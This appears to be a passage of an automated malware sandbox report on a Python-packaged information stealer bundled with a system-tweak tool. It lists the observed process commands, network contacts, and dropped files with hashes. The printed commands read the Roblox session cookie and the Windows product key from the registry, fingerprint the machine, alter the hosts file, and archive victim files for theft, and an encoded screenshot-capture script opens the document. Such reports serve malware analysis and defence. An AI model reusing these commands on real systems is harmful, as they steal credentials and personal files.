AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.cmdline"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC58.tmp" "c:\Users\Admin\AppData\Local\Temp\rnnvktba\CSCF51C99DC431C470EB442E55F62A0AC6.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\alpWw.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\alpWw.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Hone" /v "Disclaimer" /f

C:\Windows\system32\curl.exe

curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"

C:\Windows\system32\Dism.exe

dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart

C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe

C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe {16FFE513-AB3D-4775-805B-D0AAF557EA14}

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c date /t

C:\Windows\system32\reg.exe

reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y

C:\Windows\system32\reg.exe

reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\System32\choice.exe

C:\Windows\System32\choice.exe /c:1234567XD /n /m "  Select a corresponding number to the options above > "

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-jl67d.in udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
GB 142.250.180.3:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:50111 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI31722\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI31722\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/5196-26-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\base_library.zip

MD5 bbbf46529c77f766ef219f4c146e6ef5
SHA1 de07c922c7f4ba08bc1a62cf3fabddecc64f877e
SHA256 734e277712e823fca86ca75bf5d4f85a21893208e683c4ab407be10c3b9052dc
SHA512 3371a3a806dac2cfec59cc42937b348af67e190a8d575efc6a81ec3d8b215f8a0cb94010142f9d02c8881040a2d6b8364d124f85285d9b3b04f36226fb4fae66

C:\Users\Admin\AppData\Local\Temp\_MEI31722\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI31722\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/5196-34-0x00007FFC432F0000-0x00007FFC432FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\blank.aes

MD5 52b5788c281513d74bf5f1ee6a989cb8
SHA1 379318c37380fc6a3fbd50a66940cb44b9ff61e8
SHA256 c1e49817d2969a3ecd721eecefe95b4baa4583af4eecf550df32675685b6193f
SHA512 817927309fc3904565b5c48ac5efa9869338b7a318d1523f24b14abcf33a53aa64cb6eef481c7e1f98d5f2879503fc00bdfd16aa3ba141a0c9314c186f76ff05

memory/5196-31-0x00007FFC41240000-0x00007FFC41263000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

memory/5196-41-0x00007FFC41210000-0x00007FFC4123D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

memory/5196-44-0x00007FFC426D0000-0x00007FFC426E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI31722\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

memory/5196-50-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp

memory/5196-48-0x00007FFC40120000-0x00007FFC40143000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

memory/5196-53-0x00007FFC400A0000-0x00007FFC400B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

memory/5196-57-0x00007FFC432E0000-0x00007FFC432ED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

memory/5196-60-0x00007FFC3D4C0000-0x00007FFC3D4F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

C:\Users\Admin\AppData\Local\Temp\_MEI31722\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

memory/5196-66-0x00007FFC3C720000-0x00007FFC3C7ED000-memory.dmp

memory/5196-69-0x00007FFC41240000-0x00007FFC41263000-memory.dmp

memory/5196-68-0x0000019821C30000-0x0000019822150000-memory.dmp

memory/5196-67-0x00007FFC2B030000-0x00007FFC2B550000-memory.dmp

memory/5196-65-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI31722\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

memory/5196-73-0x00007FFC3D680000-0x00007FFC3D694000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\bound.blank

MD5 cad54859340aaefe3491c1e3bb6ab204
SHA1 751d2dd0769585f334d7b77c0b07a8c7051f91aa
SHA256 f7c3e0c208aa535125a233c7c2ced5aba53537ed6d093464c25bc68521d5082b
SHA512 482591d9f825812e8f5a2820b1c964076be8f5ca7e04281b40742ab66037c3e34936319bea8421585a140a9bf30c2c45eb3cbc9cf48b7bbf11488159ba9aa3d7

C:\Users\Admin\AppData\Local\Temp\_MEI31722\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

memory/5196-80-0x00007FFC426D0000-0x00007FFC426E9000-memory.dmp

memory/5196-81-0x00007FFC2AF10000-0x00007FFC2B02C000-memory.dmp

memory/5196-76-0x00007FFC40F50000-0x00007FFC40F5D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 927c47fb56b681f9395ba430ab47e311
SHA1 6cab388228bcb1f701fc6d3b7a256b8a259d2e26
SHA256 8f269626d102b795d411666f896b1227736815f38c0a952224db01ca2b30bf56
SHA512 b338a3138ce64d46ab608d095ef8a1358a054e5073f9d9de0c98e3f3f33e4cd843d223321d8e672b869c2171a6ee719e50e020ebff5c55e85f37cd199cac0383

memory/3392-91-0x000002D462230000-0x000002D462252000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulgbyxop.o1w.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\BF87.tmp\BF88.tmp\BF89.bat

MD5 dac3246a897d2448c4b572f5a159cd0d
SHA1 15ff4f8282940fd6e448dcd2a1cb82ba1eab3a13
SHA256 1605c33720463f5d1fa2ca95c4904081df6caf5a26c98dab221244be293cb4bc
SHA512 907c5bab48430b9bfcff63fac115d11bb8db28fda73ed3fc5320f3b90396ef5d3d4dc39cb274c04530cc659329aa05833f668fde5b8c6d783f183346f0fa26ce

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa4f31835d07347297d35862c9045f4a
SHA1 83e728008935d30f98e5480fba4fbccf10cefb05
SHA256 99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512 ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

memory/5196-119-0x00007FFC40120000-0x00007FFC40143000-memory.dmp

memory/5196-120-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp

memory/5196-121-0x00007FFC400A0000-0x00007FFC400B9000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.cmdline

MD5 4bdc96da7d485d26f200a4a2966477f5
SHA1 7d523fe79fbc029e8b978ad6c87a6b0fa6c54628
SHA256 952b06eba0a35b065aa2246dd67f75b683f93821e59c85584c1402607b5be7a9
SHA512 c97d3c2d79cfea4287b9f819eed4c3a464170d10150756ea4302b072057c86a363703ceeee39733ba3fc25c038cd97f3a80d38068a49e318676acb32c8097597

\??\c:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\rnnvktba\CSCF51C99DC431C470EB442E55F62A0AC6.TMP

MD5 06a3b0898cda17791805b1176a2ae4b9
SHA1 cb47086e7dc17089776bde3328d0b50488e0f84b
SHA256 17da0e84a7f0eb80dedda6af99ea87849b97f04f6125353f5e0a15dc4badc5f8
SHA512 c27dbd59e0598c71b08f9080e0eff5e0c2f352820b9b8b35f95d8dae90216cfa8d1a42bbd07a9b74ca4a9c4f2d63c1111a8fc86b09d5e665512ba1be40b8ad14

C:\Users\Admin\AppData\Local\Temp\RESCC58.tmp

MD5 681e85208ad50ff96665865d2cbc5a70
SHA1 359ebee6c85544eaca27f4e5f46b8879eb0c688b
SHA256 64d7dee74fece145aa71e545a47ec87f54d6ff784404ef06b71e82833eb489c6
SHA512 70c4610fa6926f2a8ca0d4bb43573d9ad592e5fb032072aedd9ced8ff8d78e76595fbdc88abbe61621f9149f05ee9cbc873bb95d5dea6ad6e35d3d3cb585888e

C:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.dll

MD5 4c640120a4dd7c51ac10fee029e6796a
SHA1 170529852c51790f5fd18313139221dec24557b3
SHA256 3cb380b95a5fb56b236032f2f5084f71b642a49fb12bb59ff4469a9daccd1598
SHA512 c421ff9b0a77f079fe423a0c85017b422de5f9abf117ba871acd4e959def432396571b3291b877f0b3f5a98f45b26e4bf11128d0d2ea3b7ec0b72fe3b379484c

memory/1600-195-0x0000021F2CD20000-0x0000021F2CD28000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e79ac46cc3f1bdf343b3d6aa4d243a74
SHA1 7f3532a550cbe5e0f42c97a8690efe564e512393
SHA256 741b380f81234eb877d7f411f5cdef3cd75f68c23e0d1e3928caa050978fcbc4
SHA512 b2fc181e5048a04ae773f4b23db76c60eaa39fbdbb95c84a2b6e37f922b5e259d26ff93d3dade5a398119cf275852999706a0a8ab9d3ea783dfa9465503f9f93

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

memory/5196-253-0x00007FFC3D4C0000-0x00007FFC3D4F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31722\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Desktop\MeasureConvert.docx

MD5 d16b6e67934fb2a548a0173e8e49842b
SHA1 09021da1bdf05786e49817e071ba25eed3f04ba0
SHA256 400547c1b29e77463a0546f8ebbd265a8195115cd95c3816f029fa2081132ad2
SHA512 4847ddadc9d9138d59f11915e1958d2eb68912e36d3c623739c6e263fab4f50ab537ba3550d62c02b21efdfb1369ee00cc3571023dcaff70b3d6df3cbe2e7c40

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Desktop\ProtectInvoke.xlsx

MD5 968171cad16743feefc9f3decf316ff7
SHA1 fecdb5a9cf0f45f8bae49010badfbd00f7eb133d
SHA256 41076a0281ff31c62b2eaf88d30670bb6e9d931fe2e8513f22d3fd5187b052f0
SHA512 7b889dfef362df22fcba4002b24ac5c2bff47b9a624b7ffe3900f503a22d6723f7254b741d760fdc01e40c2e98bf8227d01f0675c13c99154ad6ef4f696ba9b3

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Desktop\ReadPush.docx

MD5 d9ef1f146b732fa7cc4f1e64f346b12e
SHA1 4ee682d642afba338c89b41adbb9fa659916a0e0
SHA256 fbdce018f736bae0aaf9e4f33a940f534d7bba67bc3674108e561e219d22a227
SHA512 fe6e747b0a39dfd36820343bab6a6da32e1591de81317daeedaad5af7bc10b834de5544af77e159d156b07ede4fa4cb394911b09af8a355354bd630b584359a9

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Desktop\RepairBackup.001

MD5 5151cde2d23b7f994622117ef00689b8
SHA1 da283f84b70178dd830fa3b6483b725b1edc4474
SHA256 c8b4ce7b017bf1c3a3ea8748e586fc53da873ab3217afbf79ef2d38dea186552
SHA512 3f6be94e6f98afd5b73a9780886cce902763cbca0d735b8c54573395b6637354cdb607021778cdbb84d03f67096048c9c78d1f5d985b5fb26b1de7e32dd7d912

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Desktop\TraceCompress.xlsx

MD5 47030da086b8c6d55b3ef5f699f7969e
SHA1 eff9d51bd5a00e4fc0fcca667de39716c66f9a38
SHA256 de13beadc09e5f389060f6d93694045eadd23737df9df20ce801163ffbe22826
SHA512 01a2e75491e2128abf6b37dc904bdd759cf7d4bfd4cf4f5dea9f6d9d91649a45de4bc5a01aea76ad64584a4838859722898718ed34ad8b7a5062ab424dd8d253

C:\Users\Admin\AppData\Local\Temp\ ​   ‎ ‌‍ \Common Files\Documents\CloseUninstall.txt

MD5 6c9f8950063c724483be8e6b4f3df416
